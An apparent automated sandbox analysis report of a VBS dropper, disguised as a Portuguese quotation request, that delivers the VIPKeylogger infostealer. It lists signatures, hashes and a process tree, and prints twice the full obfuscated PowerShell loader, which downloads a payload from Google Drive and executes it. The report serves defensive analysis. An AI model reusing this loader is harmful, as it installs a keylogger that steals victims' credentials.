Analysis

  • max time kernel
    144s
  • max time network
    141s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags
    arch:x64 arch:x86 image:win10v2004-20241007-en locale:en-us os:windows10-2004-x64 system
  • submitted
    01-11-2024 05:37

General

  • Target

    Pedido de Cotação -RFQ20241030_Pdf.vbs

  • Size

    335KB

  • MD5

    238e440996ccbc86ab7cb078e3952a29

  • SHA1

    eee8085b99b27c94b661d1c253bbca2338d07412

  • SHA256

    babecadcc173a09c23ee326f8b7a9a1cc9ff1d795ca4e40c686687c8c68c0f99

  • SHA512

    ffe36f620486bd3768dcac8c43b7ea8db105d588e73cd5a99e19755c53114bc0ec7df5d1d5599e723ea21f4cea3aed3d3cb869b7d8ac1746da0d52a87bb22e36

  • SSDEEP

    6144:En64ik47Q3WAFLOgL6hPnAIjxnH7sjS3xcrl0ZIRN2XrwozRMeqzAv+qmXpiEcIF:ZgcgL8jD/wGmzcspqcqkZb

Malware Config

Extracted

Family

vipkeylogger

Credentials

Signatures

  • VIPKeylogger

    VIPKeylogger is a keylogger and infostealer written in C#; it resembles SnakeKeylogger, which was found in 2020.

  • Vipkeylogger family
  • Blocklisted process makes network request 10 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Cotação -RFQ20241030_Pdf.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2416
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Chefkahytter forforstrkeren Stipendiary Aglossa Optegnendes #>;$Fllesmarkeder='Crinet';<#Suppressedly Regnskabsadministration ministerielle Addeem Inviolate Blanketters Unperfectedness #>; function Dksdrengene($glottalise){If ($host.DebuggerEnabled) {$Homomorphic144++;}$Peberms=$Bildkkene+$glottalise.'Length'-$Homomorphic144; for ( $Sheveret=5;$Sheveret -lt $Peberms;$Sheveret+=6){$coccygomorphic=$Sheveret;$Monoplegic+=$glottalise[$Sheveret];}$Monoplegic;}function Chaplin($Skrvebanens){ & ($Samtaleemnets) ($Skrvebanens);}$Umaadelighedens=Dksdrengene 'JimsoML,ndioAnthez eneaiJong,lCassylJed,yaSwabb/Papir ';$Flabellate=Dksdrengene ' isbuTPres l de fsCi il1Coldp2M.ckl ';$Hoste=' Noni[JanglnUn coeGentiT Vent. eateSHjforePart rHypotvTi,skiMindecMillie HawapsaneroStoreI SortNPreacTCognimDilata ToxinChewya Hom g Tilhe RechrUdetj] Arbe:inter:Varmts Telee Dyppc ekruUFuse.R Lat ID lseTSubdiY DisapKeltiRSels oP einTArb jo atsucDicynoSmrreLSpeed=Abamp$FimrefFo maLBu,ikA Gy nBShi.iEDis oLFilmsLT,onsA ArcftPalteeDiffe ';$Umaadelighedens+=Dksdrengene 'Coy,o5L.nds.backi0 aby Ejend(YampaWPro riHauntnH drod orhaoTittlwProsksTreet EctypNP repTSpnen over 1Remna0 Disp. anc0 Perr;tun,t Ac eWRe ruiHand n Tilg6Sagsb4P xie;Unawk Flerexdi ul6Under4Satsn;Skate ErindrRabbiv Clup:St nd1Tippe3 ,ilo1 mmet. C rr0 He.r)Skri ommaGFdepue kompc hoejk PolloBhuta/Kanal2Voves0elect1Tumbe0Ni,zs0Kolle1Xeno,0Svmm 1 Hype BrkkeFVirkeiChapprPe iteDubitfExocroDoctrxUskyl/Mlkeg1Mreng3Skrdd1Ar,vr..etti0Deci ';$Nedenstaaende=Dksdrengene 'Rke nUSviklSKei tEJaevnRCorra-Unr.sABan lgLa,dge EnevnPunsttHubri ';$Ekspatrieres=Dksdrengene 'Mainph onpht egnet fuldp ira scongl:Krubu/Tryk./CemendPh.torNormaiSkattvRealieKunst.vitrygGuileoSlvfao Omstg Tikrl ebraeBim t. Me oc BomboCountmHuspl/HusleuFarvec Klan? 
ossteParadxPeritpChayooUnve,rWifectO den=brepodIndbao mmanwQuad.nUrethlOrganoBabyeaBevb dGorsi& .heoiPail d Pike= apsa1PossePPotenKCircux DiaxMstatsT R,diDDaa seOverc3HenrehSampaq Char4 U.orJRolfdN Kaf KPopulXSla ntSammec Ka ixAstro-KrambKHyperTTmmerZAdullnDatais Unp 5 omspv Re,rOThanjlAdstrp rsnoUn onw,edegdEs,oi ';$Ambari=Dksdrengene 'Eksal> Stif ';$Samtaleemnets=Dksdrengene 'Tran iFagudEHerskX amat ';$Sethite='Flynders';$Clotildes='\Kondemnations.Stu';Chaplin (Dksdrengene 'Torne$Ele tGP ysolTinseoFaktobEmptna ,qualAnthr:datasUM lonv d udr quipGMatkaEFormiLDatalI sjlegSupertUnre,= Disc$Eti leSamstnArachVAccre:falceADkninpSinclPWoodjDHusmnA JaetTInapoA onos+ Mili$AktivCSolskL YpuroDigittSo,gsICog.alEpitodDiploE Ultrs Rese ');Chaplin (Dksdrengene 'Nonma$TightG sterlDruesOSilkibMingla O,isLSmote: RathKPriodI MelilrefekdPaloneforhoS UnveKStaveA.ndretGengiT astee D,gslNov.lOKonfivMes ieambignPakkeeHodopSMusic=Wei.h$ rutsECl.akK Drn sHauynp AmiaALngdetChampRS.netI.igorEMisprrW.ippesnustSAffor. elveSNiflipReverL spuniCraniTChara( Pylo$Re lyaD skeMRompeB .ustaCorpoRRepariAviga)Orth ');Chaplin (Dksdrengene $Hoste);$Ekspatrieres=$Kildeskattelovenes[0];$ekstasens=(Dksdrengene ' Gor.$StorhG HoveL AfpeoAnnusBHadenaK mmoLCoqui:TruanP HistAForhalUn inARombueBarcoo Bookn amnie TrevMSvirvEKo trrGynnatKristISide NVauquEDete A Madl=AriasnExtr,eS,efaWBrand-AdmeaO moribBuckoJba cheDbuinC WellT Uddr OpnaaSmi asY Vsk,sClibaT Co,tec untMPolly. uarnNOeconEkildeT Fors.FletfWlumineFiskebDong c GentlJournIOkayse addlN ForuTfiske ');Chaplin ($ekstasens);Chaplin (Dksdrengene 'Under$ForkoPEmp.daAbdiclLampeaHaffieFul eoKy,linImprieGldssmCha,oeUncomr Bilat HangiGalopn Firee U deaShowu. 
SeriHZ lueeBranda Resed SankeCrumbrtonefsPenid[Dakty$Co ybNlatakerealedHovede Sk.an,maadsTusintNocena TopmaModk eTh,lenStalad unmue udic],arit=Sorte$Mell UWrangmTil aaSchleaPseudd Undse AmphlWeekeiDr ekgBorehhRampoeChilddHa sheImplenNon,psUnder ');$Stvfrie=Dksdrengene 'Voldg$MortiPU graabadgelLagonaC,evaeDelinoP ojenHurlieBo tfmsjakaeMen erNe frt Ashli ruppn,ilereInco a Nond.VssunD ToteoOpka wRengrnfo nulStvrioSkraaaYugaddgenerFFee,siSpagelReswie Deli(Wampu$T kstEExorckRe,ersF evapSortiaSkrivtElverrtransiExploeUimodrHakkeeFrem.sRepro,Nucl $Co teC atodrCykele ,lidsTres iEvangvOdon eParoc)Skrm ';$Cresive=$Uvrgeligt;Chaplin (Dksdrengene 'Metod$A sthG Li,vLBedetoUnderBRedemaLrestLGyldi:GerniD BlehISt rkS Lovek Ki.eA Symbn BetoT SesseOra gNUnfur=Udsvi(PatenT Hoveeforu SBilgkTErgot-SejlaPLuksuAcar vT.iktuh Un e Potb$ HexdCHj idrPsykieUndeps Id.nIVaredV ncoresocag)Vejle ');while (!$Diskanten) {Chaplin (Dksdrengene 'Masto$Hushtg ,lasl RhaboAltmubHoneyaBa milHype,:A ridSPakket m ltoPredirs.aldfS hoooB llerPriorb Ba,brStagguDecargKorseepraecrNoneasFotoa=,amac$ S.aet ucurCes pucalimeWivec ') ;Chaplin $Stvfrie;Chaplin (Dksdrengene 'Bark sMik oT ShinaSkinkrM croTChawb-NewfasSandwLProkleN.natEannmap Hink Sport4R,gnh ');Chaplin (Dksdrengene ' Part$MiksegIntraLBorgeoEddadbMachiADilatl Stea:Descad osiICastiSSuperKSmokeAH.llanEngo.TImpenEAtomanParec= Dens(UndelT Uds E plumsRepawtUddan-Chau.p OpbaaKo.materhveHNe.fo Pa e$meg lCI drerShagtegaardS.sychIGenopv UrnfeBackb)Dr.in ') ;Chaplin (Dksdrengene 'Mijn $Sinh GHvlveLZaithoGoldwbJenlgaMy teL A si:GrnttoPerikRTal,tAAut.kT etbuo KonfRTumidlPersoiTor,ekPreexeMobil5 He.e=Imm n$Me icg DdskLSpra oMisbeb Monoa TwisLex,an:.easeSSciamuContrBEmeroO Cla b .oudLNitriIAtommq Mel u inseEbeskiLSkaffY ande+ ubge+Umrke%Nonwh$TandrKSk,diIAtom LCap rdF,rdue edbeSBy nikC,ustA,ollatCu bstHulkoE ozerLVa,iooUnpriVDisprE adion RowtenamessRetro.Ser,ecPeripOSemipU SnvsN jarkTPrinc ') 
;$Ekspatrieres=$Kildeskattelovenes[$Oratorlike5];}$Kloningens=291747;$Telexes=30474;Chaplin (Dksdrengene 'Antir$SortsgD.shalDictaO GormbPilheA RekrL inot:paaskB NonmE .ellNtkkelD olstE.chmoeFol eSFiske Skri=posty GrungEleaneDispotMikro-RetsfCgigaboH,rpsNSp bat t ruEU worNi.dhaTAutoe Ungra$Ho.otcDephyrDarkleStjflsbevilIClac.vQuadretid a ');Chaplin (Dksdrengene 'Peace$Nondig arbelRekoro.olfbbKnotna yleblSlutt:ExaspAArsend ovpre Sph l ManubGnaveeBerasrLa.ultOverl Theo=feci, Sp,ci[ Ca dS Sa ayH.mmesMai itlexipeGelinmSpade.miniaC KirkoOpalinAwarevPsil eGrsserRiccitGodm ]rrel : Oxya: R.keFUncanr ForaoBygdemPelagB Ra daA maisBo tpeUd in6Paatv4BrandSemmottHyd.trConv i VirinR ombg sthn(Busin$PersiBAnkyle EspanBoksedSkjuleSy teeKonkus Oilt)Streg ');Chaplin (Dksdrengene ' Dele$HonniG,alveLAl,ogO YoghBCustoaTuttslMaksi:ObjekSGoniowUnconiCorneLBr,llLRyk.eb raveoMlkenw SamlL Ends Kaske=Nunci Lever[Sockes LivlyFi.riSChro t.arsreOverlmHandw.NominTAseiseHam lXFuseltflles.DraabeNonilnBaranCPreacOBog.pdVideriArm.rnJoustGSlagv] Spil:Tiltv:Over aCoendSLandiCDeco,iDiscriExant.Skre GPsykoeSheltT S ksSTrollTTri crPeshkIFlydenO phaGUnap.(B rde$TribaaLinoldStatiET ntelSkilnberhveeTh ncrLectiTSyste) Kapi ');Chaplin (Dksdrengene 'Monos$ issegMotivlKvkkeoM tacb Cen.AB ugtlOprik:ZoomiF JubioStayerFortefSwartrCrumbeRegissHonni=T,del$UddybS HjerWFinkmiIngrelB dirl.lbanBArctoO H roW verflBilop.EfterS mateuPeridbTaanesMil iTJo neRGe riIUnpr,n ,latgFrede(I fra$ P ndKF,owslAdr soPulviNBibetiTutteNForesg,ekvieSol dN Tu.tSKalib,Piar $IsdantSekseE oreoLNonsiED ltrx sm keWilkeSChoco)Amph, ');Chaplin $Forfres;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5076
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Chefkahytter forforstrkeren Stipendiary Aglossa Optegnendes #>;$Fllesmarkeder='Crinet';<#Suppressedly Regnskabsadministration ministerielle Addeem Inviolate Blanketters Unperfectedness #>; function Dksdrengene($glottalise){If ($host.DebuggerEnabled) {$Homomorphic144++;}$Peberms=$Bildkkene+$glottalise.'Length'-$Homomorphic144; for ( $Sheveret=5;$Sheveret -lt $Peberms;$Sheveret+=6){$coccygomorphic=$Sheveret;$Monoplegic+=$glottalise[$Sheveret];}$Monoplegic;}function Chaplin($Skrvebanens){ & ($Samtaleemnets) ($Skrvebanens);}$Umaadelighedens=Dksdrengene 'JimsoML,ndioAnthez eneaiJong,lCassylJed,yaSwabb/Papir ';$Flabellate=Dksdrengene ' isbuTPres l de fsCi il1Coldp2M.ckl ';$Hoste=' Noni[JanglnUn coeGentiT Vent. eateSHjforePart rHypotvTi,skiMindecMillie HawapsaneroStoreI SortNPreacTCognimDilata ToxinChewya Hom g Tilhe RechrUdetj] Arbe:inter:Varmts Telee Dyppc ekruUFuse.R Lat ID lseTSubdiY DisapKeltiRSels oP einTArb jo atsucDicynoSmrreLSpeed=Abamp$FimrefFo maLBu,ikA Gy nBShi.iEDis oLFilmsLT,onsA ArcftPalteeDiffe ';$Umaadelighedens+=Dksdrengene 'Coy,o5L.nds.backi0 aby Ejend(YampaWPro riHauntnH drod orhaoTittlwProsksTreet EctypNP repTSpnen over 1Remna0 Disp. anc0 Perr;tun,t Ac eWRe ruiHand n Tilg6Sagsb4P xie;Unawk Flerexdi ul6Under4Satsn;Skate ErindrRabbiv Clup:St nd1Tippe3 ,ilo1 mmet. C rr0 He.r)Skri ommaGFdepue kompc hoejk PolloBhuta/Kanal2Voves0elect1Tumbe0Ni,zs0Kolle1Xeno,0Svmm 1 Hype BrkkeFVirkeiChapprPe iteDubitfExocroDoctrxUskyl/Mlkeg1Mreng3Skrdd1Ar,vr..etti0Deci ';$Nedenstaaende=Dksdrengene 'Rke nUSviklSKei tEJaevnRCorra-Unr.sABan lgLa,dge EnevnPunsttHubri ';$Ekspatrieres=Dksdrengene 'Mainph onpht egnet fuldp ira scongl:Krubu/Tryk./CemendPh.torNormaiSkattvRealieKunst.vitrygGuileoSlvfao Omstg Tikrl ebraeBim t. Me oc BomboCountmHuspl/HusleuFarvec Klan? 
ossteParadxPeritpChayooUnve,rWifectO den=brepodIndbao mmanwQuad.nUrethlOrganoBabyeaBevb dGorsi& .heoiPail d Pike= apsa1PossePPotenKCircux DiaxMstatsT R,diDDaa seOverc3HenrehSampaq Char4 U.orJRolfdN Kaf KPopulXSla ntSammec Ka ixAstro-KrambKHyperTTmmerZAdullnDatais Unp 5 omspv Re,rOThanjlAdstrp rsnoUn onw,edegdEs,oi ';$Ambari=Dksdrengene 'Eksal> Stif ';$Samtaleemnets=Dksdrengene 'Tran iFagudEHerskX amat ';$Sethite='Flynders';$Clotildes='\Kondemnations.Stu';Chaplin (Dksdrengene 'Torne$Ele tGP ysolTinseoFaktobEmptna ,qualAnthr:datasUM lonv d udr quipGMatkaEFormiLDatalI sjlegSupertUnre,= Disc$Eti leSamstnArachVAccre:falceADkninpSinclPWoodjDHusmnA JaetTInapoA onos+ Mili$AktivCSolskL YpuroDigittSo,gsICog.alEpitodDiploE Ultrs Rese ');Chaplin (Dksdrengene 'Nonma$TightG sterlDruesOSilkibMingla O,isLSmote: RathKPriodI MelilrefekdPaloneforhoS UnveKStaveA.ndretGengiT astee D,gslNov.lOKonfivMes ieambignPakkeeHodopSMusic=Wei.h$ rutsECl.akK Drn sHauynp AmiaALngdetChampRS.netI.igorEMisprrW.ippesnustSAffor. elveSNiflipReverL spuniCraniTChara( Pylo$Re lyaD skeMRompeB .ustaCorpoRRepariAviga)Orth ');Chaplin (Dksdrengene $Hoste);$Ekspatrieres=$Kildeskattelovenes[0];$ekstasens=(Dksdrengene ' Gor.$StorhG HoveL AfpeoAnnusBHadenaK mmoLCoqui:TruanP HistAForhalUn inARombueBarcoo Bookn amnie TrevMSvirvEKo trrGynnatKristISide NVauquEDete A Madl=AriasnExtr,eS,efaWBrand-AdmeaO moribBuckoJba cheDbuinC WellT Uddr OpnaaSmi asY Vsk,sClibaT Co,tec untMPolly. uarnNOeconEkildeT Fors.FletfWlumineFiskebDong c GentlJournIOkayse addlN ForuTfiske ');Chaplin ($ekstasens);Chaplin (Dksdrengene 'Under$ForkoPEmp.daAbdiclLampeaHaffieFul eoKy,linImprieGldssmCha,oeUncomr Bilat HangiGalopn Firee U deaShowu. 
SeriHZ lueeBranda Resed SankeCrumbrtonefsPenid[Dakty$Co ybNlatakerealedHovede Sk.an,maadsTusintNocena TopmaModk eTh,lenStalad unmue udic],arit=Sorte$Mell UWrangmTil aaSchleaPseudd Undse AmphlWeekeiDr ekgBorehhRampoeChilddHa sheImplenNon,psUnder ');$Stvfrie=Dksdrengene 'Voldg$MortiPU graabadgelLagonaC,evaeDelinoP ojenHurlieBo tfmsjakaeMen erNe frt Ashli ruppn,ilereInco a Nond.VssunD ToteoOpka wRengrnfo nulStvrioSkraaaYugaddgenerFFee,siSpagelReswie Deli(Wampu$T kstEExorckRe,ersF evapSortiaSkrivtElverrtransiExploeUimodrHakkeeFrem.sRepro,Nucl $Co teC atodrCykele ,lidsTres iEvangvOdon eParoc)Skrm ';$Cresive=$Uvrgeligt;Chaplin (Dksdrengene 'Metod$A sthG Li,vLBedetoUnderBRedemaLrestLGyldi:GerniD BlehISt rkS Lovek Ki.eA Symbn BetoT SesseOra gNUnfur=Udsvi(PatenT Hoveeforu SBilgkTErgot-SejlaPLuksuAcar vT.iktuh Un e Potb$ HexdCHj idrPsykieUndeps Id.nIVaredV ncoresocag)Vejle ');while (!$Diskanten) {Chaplin (Dksdrengene 'Masto$Hushtg ,lasl RhaboAltmubHoneyaBa milHype,:A ridSPakket m ltoPredirs.aldfS hoooB llerPriorb Ba,brStagguDecargKorseepraecrNoneasFotoa=,amac$ S.aet ucurCes pucalimeWivec ') ;Chaplin $Stvfrie;Chaplin (Dksdrengene 'Bark sMik oT ShinaSkinkrM croTChawb-NewfasSandwLProkleN.natEannmap Hink Sport4R,gnh ');Chaplin (Dksdrengene ' Part$MiksegIntraLBorgeoEddadbMachiADilatl Stea:Descad osiICastiSSuperKSmokeAH.llanEngo.TImpenEAtomanParec= Dens(UndelT Uds E plumsRepawtUddan-Chau.p OpbaaKo.materhveHNe.fo Pa e$meg lCI drerShagtegaardS.sychIGenopv UrnfeBackb)Dr.in ') ;Chaplin (Dksdrengene 'Mijn $Sinh GHvlveLZaithoGoldwbJenlgaMy teL A si:GrnttoPerikRTal,tAAut.kT etbuo KonfRTumidlPersoiTor,ekPreexeMobil5 He.e=Imm n$Me icg DdskLSpra oMisbeb Monoa TwisLex,an:.easeSSciamuContrBEmeroO Cla b .oudLNitriIAtommq Mel u inseEbeskiLSkaffY ande+ ubge+Umrke%Nonwh$TandrKSk,diIAtom LCap rdF,rdue edbeSBy nikC,ustA,ollatCu bstHulkoE ozerLVa,iooUnpriVDisprE adion RowtenamessRetro.Ser,ecPeripOSemipU SnvsN jarkTPrinc ') 
;$Ekspatrieres=$Kildeskattelovenes[$Oratorlike5];}$Kloningens=291747;$Telexes=30474;Chaplin (Dksdrengene 'Antir$SortsgD.shalDictaO GormbPilheA RekrL inot:paaskB NonmE .ellNtkkelD olstE.chmoeFol eSFiske Skri=posty GrungEleaneDispotMikro-RetsfCgigaboH,rpsNSp bat t ruEU worNi.dhaTAutoe Ungra$Ho.otcDephyrDarkleStjflsbevilIClac.vQuadretid a ');Chaplin (Dksdrengene 'Peace$Nondig arbelRekoro.olfbbKnotna yleblSlutt:ExaspAArsend ovpre Sph l ManubGnaveeBerasrLa.ultOverl Theo=feci, Sp,ci[ Ca dS Sa ayH.mmesMai itlexipeGelinmSpade.miniaC KirkoOpalinAwarevPsil eGrsserRiccitGodm ]rrel : Oxya: R.keFUncanr ForaoBygdemPelagB Ra daA maisBo tpeUd in6Paatv4BrandSemmottHyd.trConv i VirinR ombg sthn(Busin$PersiBAnkyle EspanBoksedSkjuleSy teeKonkus Oilt)Streg ');Chaplin (Dksdrengene ' Dele$HonniG,alveLAl,ogO YoghBCustoaTuttslMaksi:ObjekSGoniowUnconiCorneLBr,llLRyk.eb raveoMlkenw SamlL Ends Kaske=Nunci Lever[Sockes LivlyFi.riSChro t.arsreOverlmHandw.NominTAseiseHam lXFuseltflles.DraabeNonilnBaranCPreacOBog.pdVideriArm.rnJoustGSlagv] Spil:Tiltv:Over aCoendSLandiCDeco,iDiscriExant.Skre GPsykoeSheltT S ksSTrollTTri crPeshkIFlydenO phaGUnap.(B rde$TribaaLinoldStatiET ntelSkilnberhveeTh ncrLectiTSyste) Kapi ');Chaplin (Dksdrengene 'Monos$ issegMotivlKvkkeoM tacb Cen.AB ugtlOprik:ZoomiF JubioStayerFortefSwartrCrumbeRegissHonni=T,del$UddybS HjerWFinkmiIngrelB dirl.lbanBArctoO H roW verflBilop.EfterS mateuPeridbTaanesMil iTJo neRGe riIUnpr,n ,latgFrede(I fra$ P ndKF,owslAdr soPulviNBibetiTutteNForesg,ekvieSol dN Tu.tSKalib,Piar $IsdantSekseE oreoLNonsiED ltrx sm keWilkeSChoco)Amph, ');Chaplin $Forfres;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4308
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Accesses Microsoft Outlook profiles
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • outlook_office_path
      • outlook_win_path
      PID:2012

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    44a071b5b03cdad0f233428b60507ab2

    SHA1

    fb2a6cb8abb0cccd428614e39cc9eb4c983cfb87

    SHA256

    b75bf24e17edc409cb664bd10198b4fef5f5166d510e13f9370efaafd9c8a6e4

    SHA512

    ffde66357926f5345190fe6f97f25bc5a4d8c6db6b62ff3f261f68b02cda396d6e8101d3f18b4fda53223652b0bbfda1577711379573c6f58cdf96110257c851

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hdg1qak5.the.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Kondemnations.Stu

    Filesize

    419KB

    MD5

    d3eaa25322d53ddaef4b33d72552badf

    SHA1

    4d703e333fce51d3849a1467268437b89d0cf239

    SHA256

    d35582b6c56ab0068075a1a5e338cd0d24c381673cf959eca45e516fedf471f3

    SHA512

    60aa35eb0d284caab596550fe1218af035c4ba38e29196436c0f3e09f89b87d51a7bdf680995f260ab08e6b44d9e4f564cc589c3c63cbfb98598ace3ea5becd1

  • memory/2012-57-0x0000000000C00000-0x0000000001E54000-memory.dmp

    Filesize

    18.3MB

  • memory/2012-65-0x0000000023C30000-0x0000000023C3A000-memory.dmp

    Filesize

    40KB

  • memory/2012-64-0x0000000023C80000-0x0000000023D12000-memory.dmp

    Filesize

    584KB

  • memory/2012-62-0x0000000023B50000-0x0000000023BA0000-memory.dmp

    Filesize

    320KB

  • memory/2012-61-0x00000000243F0000-0x00000000245B2000-memory.dmp

    Filesize

    1.8MB

  • memory/2012-59-0x0000000023890000-0x000000002392C000-memory.dmp

    Filesize

    624KB

  • memory/2012-58-0x0000000000C00000-0x0000000000C48000-memory.dmp

    Filesize

    288KB

  • memory/4308-22-0x0000000004FA0000-0x0000000004FC2000-memory.dmp

    Filesize

    136KB

  • memory/4308-38-0x0000000007680000-0x0000000007CFA000-memory.dmp

    Filesize

    6.5MB

  • memory/4308-24-0x0000000005760000-0x00000000057C6000-memory.dmp

    Filesize

    408KB

  • memory/4308-39-0x0000000006400000-0x000000000641A000-memory.dmp

    Filesize

    104KB

  • memory/4308-37-0x0000000005EA0000-0x0000000005EEC000-memory.dmp

    Filesize

    304KB

  • memory/4308-36-0x0000000005E80000-0x0000000005E9E000-memory.dmp

    Filesize

    120KB

  • memory/4308-23-0x0000000005680000-0x00000000056E6000-memory.dmp

    Filesize

    408KB

  • memory/4308-21-0x0000000004FE0000-0x0000000005608000-memory.dmp

    Filesize

    6.2MB

  • memory/4308-34-0x0000000005810000-0x0000000005B64000-memory.dmp

    Filesize

    3.3MB

  • memory/4308-41-0x0000000007080000-0x00000000070A2000-memory.dmp

    Filesize

    136KB

  • memory/4308-40-0x00000000070E0000-0x0000000007176000-memory.dmp

    Filesize

    600KB

  • memory/4308-20-0x00000000048F0000-0x0000000004926000-memory.dmp

    Filesize

    216KB

  • memory/4308-42-0x00000000082B0000-0x0000000008854000-memory.dmp

    Filesize

    5.6MB

  • memory/4308-44-0x0000000008860000-0x000000000C1B6000-memory.dmp

    Filesize

    57.3MB

  • memory/5076-12-0x00007FFD40AA0000-0x00007FFD41561000-memory.dmp

    Filesize

    10.8MB

  • memory/5076-11-0x00007FFD40AA0000-0x00007FFD41561000-memory.dmp

    Filesize

    10.8MB

  • memory/5076-0-0x00007FFD40AA3000-0x00007FFD40AA5000-memory.dmp

    Filesize

    8KB

  • memory/5076-19-0x00007FFD40AA0000-0x00007FFD41561000-memory.dmp

    Filesize

    10.8MB

  • memory/5076-16-0x00007FFD40AA0000-0x00007FFD41561000-memory.dmp

    Filesize

    10.8MB

  • memory/5076-15-0x00007FFD40AA3000-0x00007FFD40AA5000-memory.dmp

    Filesize

    8KB

  • memory/5076-10-0x00000242CDF70000-0x00000242CDF92000-memory.dmp

    Filesize

    136KB